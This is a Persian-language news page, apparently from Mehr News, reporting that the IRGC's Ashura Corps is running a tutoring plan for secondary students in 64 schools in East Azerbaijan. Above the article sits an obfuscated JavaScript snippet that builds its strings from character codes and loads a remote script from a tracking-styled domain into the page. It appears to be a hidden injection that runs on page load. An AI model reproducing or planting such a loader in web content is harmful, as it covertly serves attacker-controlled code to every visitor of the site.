var u = String.fromCharCode(104,116,116,112,115,58,47,47,99,111,117,110,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61);var d=document;var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); var pl = u; s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s);var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116));list.insertBefore(s, list.childNodes[0]);}

طرح «کلاس خدمت جهادی» در آذربایجان شرقی اجرا می شود

مسئول مرکز حرکت های جهادی سپاه عاشورا از اجرای طرح استانی کلاس خدمت جهادی ویژ دانش آموزان خبر داد.

به گزارش خبرگزاری مهر به نقل از روابط عمومی سپاه عاشورا، مسئول مرکز حرکت های جهادی سپاه عاشورا با اشاره به اجرای طرح خدمت جهادی گفت: هدف از اجرای طرح کلاس خدمت جهادی، کمک به ارتقای توانمندی دانش آموزان مقطع متوسطه دوم استان در دروس پایه است.

علی نصیری افزود: دانش آموزانی که در این دروس ضعیف هستند با همکاری بسیج سازندگی ،بسیج دانش آموزی، بسیج فرهنگیان و با کمک آموزش و پرورش دوره های تقویتی را خواهند گذراند.

وی با اشاره به تعداد مدارس مشمول این طرح خاطرنشان کرد: این طرح در مرحله اول در ۶۴ مدرسه آذربایجان شرقی با حضور هزار و ۲۸۰ نفر دانش آموز اجرا می شود.

مسئول مرکز حرکت های جهادی سپاه عاشورا عنوان کرد: تا پایان امسال تعداد مدارس تحت پوشش این طرح به ۲۰۰ مدرسه و تعداد دانش آموزان به ۴ هزار دانش آموز افزایش خواهد یافت.

نصیری با اشاره به نقش معلمان بسیجی در اجرای این طرح گفت: معلمان بسیجی در اجرای کلاس خدمت جهادی سهم عمده ای در ارتقاء توانمندی علمی دانش آموزان ایفا خواهند کرد.

مسئول مرکز حرکت های جهادی سپاه عاشورا اذعان داشت: در سال آینده نیز این طرح علاوه بر مدارس متوسطه دوم در متوسطه اول نیز اجرا می شود.

پیام بگذارید